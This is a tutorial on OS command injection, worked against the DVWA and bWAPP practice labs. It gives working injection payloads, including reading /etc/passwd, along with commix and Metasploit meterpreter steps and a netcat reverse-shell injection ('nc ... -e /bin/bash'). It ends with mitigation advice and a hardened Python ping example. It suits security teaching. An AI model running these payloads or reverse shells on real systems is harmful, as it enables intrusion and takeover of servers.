
Comprehensive Guide on OS Command Injection


Contents
Introduction .... 3
Introduction to Command Injection .... 3
How Command Injection Occurs? .... 3
Metacharacters .... 4
Types of Command Injection .... 4
Impact of OS Command Injection .... 5
Steps to exploit – OS Command Injection .... 5
Manual Exploitation .... 5
    Basic OS Command injection .... 5
    Bypass a Blacklist implemented .... 7
Exploitation through Automated tools .... 7
    Command Injection using BurpSuite .... 8
        Manual .... 8
        Fuzzing .... 10
    OS Command Injection using Commix .... 14
    OS Command Injection using Metasploit .... 18
Blind OS Command Injection .... 20
    Detection of Blind OS Command Injection .... 20
    Exploiting Blind OS Command Injection using Netcat .... 22
Mitigation – OS Command Injection .... 23


Introduction
Isn’t it great if you get the privilege to run any system command directly on the target’s server
through its hosted web application? Or if you can get a reverse shell with a few simple clicks? In this
article, we’ll learn about OS Command Injection, in which an attacker is able to trigger arbitrary
system shell commands on the hosting operating system via a vulnerable web application.

Introduction to Command Injection


Command Injection is also referred to as Shell Injection or OS Injection. It arises when an attacker is
able to run system-level commands directly through a vulnerable application in order to retrieve
information from the web server or gain unauthorized access to it. Such an attack is possible only
when the user-supplied data is not properly validated before being passed to the server. This user
data can arrive in any form, such as forms, cookies, HTTP headers, etc.

How Command Injection Occurs?


There are many situations in which developers add functionality to their web application by making
use of operating system commands. However, if the application passes the user-supplied input
directly to the server without any validation, the application may become vulnerable to command
injection attacks.

To make this clearer, let’s consider this scenario:

Think of a web application providing functionality that lets any user ping a particular IP address
through its web interface in order to confirm host connectivity; this means the application is passing
the ping command with that particular input IP directly to the server.

Now, if an attacker appends an unwanted system command to the basic ping command using some
metacharacters, the web application passes it all to the server directly for execution, allowing the
attacker to gain complete access to the operating system, start or stop a particular service, view or
delete any system file and even capture a remote shell.

Metacharacters
Metacharacters are the symbolic operators used to separate the actual command from the injected
system commands. The semicolon (;) and the ampersand (&) are the most commonly used
separators dividing the legitimate input command from the command that is being injected.

The commonly used metacharacters are:

Types of Command Injection


Error-based injection: When an attacker injects a command through an input parameter and the
output of that command is displayed on the web page, it proves that the application is vulnerable to
command injection. The displayed result might be in the form of an error or the actual output of the
command you tried to run. An attacker then modifies and adds additional commands, depending on
the shell of the web server, and assembles information from the application.


Blind-based injection: The results of the injected commands are not displayed to the attacker and no
error messages are returned. The attacker must use another technique to identify whether the
command was really executed on the server or not.

The OS Command Injection vulnerability is one of the OWASP Top 10 vulnerabilities. Therefore, let’s
have a look at its impact.

Impact of OS Command Injection


OS command injection is one of the most powerful vulnerabilities, with “High Severity having a CVSS
Score of 8”.

This injection is reported under:

1. CWE-77: Improper Neutralization of Special Elements used in a Command.

2. CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Wonder how to exploit this vulnerability? Let’s check out its steps:

Steps to exploit – OS Command Injection


1. Identify the input field
2. Understand the functionality
3. Try the ping method (time delay)
4. Use various operators to exploit OS Command Injection

So, I guess by now you have a clear picture of the concept of OS command injection and its
methodology. But before getting our hands dirty with the attacks, let’s clear up one more thing, i.e.

“Command Injection differs from Code Injection”, in that code injection allows the attacker to add
their own code that is then executed by the application. In Command Injection, the attacker extends
the default functionality of the application, which executes system commands, without the necessity
of injecting code. Source:

https://www.owasp.org/index.php/Command_Injection

Let’s Start!!

Manual Exploitation
Basic OS Command injection
I’ve opened the target IP in my browser and logged in to DVWA as admin:password; from the DVWA
Security option I’ve set the security level to low. Then I’ve opted for the Command Injection
vulnerability listed on the left-hand side of the window.

I’ve been presented with a form suffering from an OS command injection vulnerability, asking me to
“Enter an IP address:”.

From the image below you can see that I’ve tried to ping localhost by typing 127.0.0.1, and
got the output result.


In order to perform the “Basic OS Command Injection attack”, I’ve used the “; (semicolon)” as a
metacharacter and entered another arbitrary command, i.e. “ls”:

127.0.0.1;ls

From the image below you can see that the “;” metacharacter did its work, and we are able to list the
contents of the directory where the application actually resides. Similarly, we can run other system
commands such as “;pwd”, “;id”, etc.


Bypass a Blacklist implemented


Many times developers set up a blacklist of the commonly used metacharacters, i.e. “&”, “;”,
“&&”, “||”, “#” and others, to protect their web applications from command injection
vulnerabilities.

Therefore, in order to bypass this blacklist, we need to try all the different metacharacters that the
developer forgot to add.

I’ve increased the security level to high and tried all the different combinations of
metacharacters.

From the above image, you can see that I’ve successfully captured the password file by using the
metacharacter “|”:

127.0.0.1 |cat /etc/passwd


Exploitation through Automated tools


Command Injection using BurpSuite
Burp Suite is considered one of the best and most powerful tools for web penetration testing.
So we’ll try to deface the web application through it.

Manual
I’ve now logged in to bWAPP with bee:bug by opening the target’s IP in the browser, and have
set the security level to medium and the “Choose your bug” option to “OS Command
Injection”.

Let’s try to enumerate this “DNS lookup” form by clicking on the Lookup button, capturing the
browser’s request in the Proxy tab and sending it to the Repeater.


Now I just need to manipulate the target by adding some system commands, i.e. “pwd”, with the
help of metacharacters.

Here I’ve used “|” as the delimiter; you can choose your own.

As soon as I click on the Go button, the response is generated and on the right-hand side of the
window you can see that I’ve captured the working directory.


Fuzzing
In the last scenario, while bypassing the implemented blacklist, we were lucky that the developer
had set up the list with a limited combination of metacharacters. But it still took time to check
every possible combination of metacharacters. It is also obvious that the same metacharacter
will not work with every web application, so in order to bypass these differently generated
blacklists we’ll be doing a fuzzing attack.

Let’s check out how!!

I’ve created a dictionary with all the possible combinations of metacharacters and will now
simply include it in my attack.

Tune in your Burp Suite and start intercepting the request; as soon as you capture the ongoing
request, send it to the Intruder by simply right-clicking in the Proxy tab and choosing the
option to send to Intruder.


Now we’ll set up the attack position by shifting to the Positions tab and selecting the area where
we want the attack to happen with the ADD button.

Time to inject our dictionary: move to the Payloads tab and click on the Load button in order to
load our dictionary file.


As soon as I hit the Start Attack button, a new window pops up with the fuzzing attack.

From the screenshot below, it’s clear that our attack has started and there is a fluctuation in the
Length column. I’ve double-clicked on the Length field in order to get the highest value first.


From the image below, you can see that as soon as I clicked on the 11th request, I was able to
see the output of the ls command in the Response tab.


OS Command Injection using Commix


Sometimes fuzzing consumes a lot of time, and it can even become somewhat frustrating while
performing a command injection attack this way, i.e. waiting for the incremented length and checking
every possible response it drops.

In order to make our attack simpler and faster, we’ll be using a Python-scripted automated tool,
“Commix”, which makes it very easy to find a command injection vulnerability and then helps us to
exploit it. You can learn more about Commix from here.

So let’s try to take down the web application again by getting a commix session on our Kali machine.

From the image below you can see that I’ve set the security level to high and the “Choose
your bug” option to “OS Command Injection”.


Commix works with cookies. In order to get them, I’ll capture the browser’s request in my
Burp Suite by enabling the proxy and intercept options; as I hit the Lookup button, I’ll be
presented with the details in Burp Suite’s Proxy tab.

Fire up your Kali terminal with commix and run the following command with the Referer, Cookie and
target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"

Type ‘y’ to resume the classic injection point and to get the pseudo-terminal shell.


Great!! We’re into our target machine.

What if we could convert this commix shell into a meterpreter one?

As soon as we have the commix session, we’ll try to generate a reverse meterpreter session on the
target machine by executing the following commands:

reverse_tcp
set lhost 192.168.0.9
set lport 4444

As we hit enter, it asks us to choose whether we want a netcat shell or some other (meterpreter)
one. Choose option 2 and hit enter again.

Now a new list of sessions pops up asking which meterpreter session you want, i.e. whether you
want it to be PHP, Windows, Python, etc. As our target server is running on the PHP framework, we
will select option 8, i.e. a PHP meterpreter reverse shell.


When everything is done, it provides us with a resource file and an execution command. Open a
new terminal window and type the presented command there; in our case it generated the
following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc

Cool!! It’s great to see that our commix session now has some new wings.


OS Command Injection using Metasploit


Why drive so far to get a meterpreter session if we can gain it directly through the Metasploit
framework?

Let’s check out how.

Boot the Metasploit framework in your Kali terminal by running the simple command
“msfconsole”.

There are many different ways to reach our intended outcome, but we will use the
web_delivery exploit in order to transfer our malicious payload to the remote machine.

Type the following commands to generate our payload:

use exploit/multi/script/web_delivery

Now it’s time to choose our target.

Type “show targets” in order to get the complete list of all the built-in target options.

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 2222
exploit


As soon as I hit enter after typing exploit, the Metasploit framework generates the payload with
all the essentials.

We are almost done; simply include this payload in the command using any metacharacter.

Here I’ve used & (ampersand) so that the server executes both commands one after the other.

From the image below you can see that we are into the target’s system again, but this time we are
more powerful with the Metasploit session.


Blind OS Command Injection


Until now, we were lucky enough that the web applications returned the output of the
commands directly on the screen through their HTTP responses. But there are many situations in which
an application does not return anything and still runs system commands in its backend
processes. So the question arises: are such web applications vulnerable to command injection?

Let’s try to figure this out by using the most reliable method, the time-delay ping command, which
will detect whether the application is suffering from command injection or not.

Detection of Blind OS Command Injection


I’ve now logged in to bWAPP and set the “Choose your bug” option to “OS Command
Injection - Blind”, with the security level set to medium.

I’ve been redirected to the web application that is suffering from the command injection
vulnerability.

Let’s check whether this application is actually suffering from OS Command Injection or not.

Enter any IP address in the field provided and turn on your Burp Suite intercept in order to capture
the ongoing HTTP request, then forward it to the Repeater tab.


Now we’ll try to manipulate the request with

ping -c 10 192.168.0.9

As I clicked on the Go button, it took about 10 seconds to display the response. This confirms
that this web application is suffering from OS Command Injection.


Exploiting Blind OS Command Injection using Netcat


By now we have confirmed that the application we are testing is suffering from a command
injection vulnerability. Let’s try to trigger this web application into giving us a reverse shell
using netcat.

From the image below you can see that I’ve checked my Kali machine’s IP address and set up a
netcat listener on port number 2000 using

nc -lvp 2000

where l = listen, v = verbose mode and p = port.

Now on the web application, I’ve injected my netcat system command along with the localhost
command into the input field, i.e.

localhost|nc 192.168.0.9 -e /bin/bash

The -e /bin/bash option makes netcat execute a bash shell and hand it to the listener machine.


Great!! We are into the victim’s shell through our Kali machine and are now able to run any system
command from here.

Mitigation – OS Command Injection


Developers should set up strong server-side validation code and implement a whitelist of allowed
input, accepting only letters and digits rather than special characters.


You can check this all out in the following code snippet. It can protect web applications from
exposure to command injection vulnerabilities.

Avoid having the application call OS system commands directly. If needed, developers can use the
built-in API for interacting with the operating system.

Developers should also ensure that the application runs with the least privileges.
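As an added example (not code from this guide, DVWA or bWAPP), here is the ping feature from the scenario at the start of the guide written the vulnerable way beside a hardened version that follows the advice in this section: whitelist validation of the host, and running ping through an argument list so no shell ever parses the input. Function names are hypothetical; the blacklist check is included only to show why the “|” bypass above works against it.

```python
import ipaddress
import re
import subprocess

# Characters a POSIX shell treats specially. A blacklist of ; & && || # alone
# (as in the bypass section) misses "|", backticks and $( ) substitution.
SHELL_METACHARACTERS = re.compile(r"[;&|`$(){}<>\n\r\\'\"]")


def ping_vulnerable_command(host: str) -> str:
    """Builds the shell string the vulnerable form effectively runs.
    User input is concatenated into a line handed to /bin/sh, so
    "127.0.0.1;ls" becomes two commands. Returned only, never executed."""
    return "ping -c 1 " + host


def has_shell_metacharacters(value: str) -> bool:
    """Blacklist-style check: rejects known separators but must be kept
    complete forever, which is why an allowlist is preferred below."""
    return SHELL_METACHARACTERS.search(value) is not None


def validate_host(value: str) -> str:
    """Allowlist validation (hypothetical helper): accept only a literal
    IPv4/IPv6 address or a hostname of letters, digits, dots and hyphens."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?", value):
        return value
    raise ValueError("host must be an IP address or a plain hostname")


def is_valid_host(value: str) -> bool:
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def ping_hardened_argv(host: str) -> list:
    """Validate first, then build an argument vector. A list passed to
    subprocess.run with shell=False never invokes a shell, so even a
    metacharacter that slipped through would reach ping as one literal
    argument, not as a second command."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str, timeout: float = 10.0) -> str:
    """Execute the hardened command and return its combined output."""
    result = subprocess.run(ping_hardened_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout + result.stderr


if __name__ == "__main__":
    print(ping_vulnerable_command("127.0.0.1;ls"))     # the string the guide injects
    print(ping_hardened_argv("127.0.0.1"))
    print(is_valid_host("127.0.0.1 |cat /etc/passwd"))  # rejected by the allowlist
```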

To learn more about website hacking, follow this link.
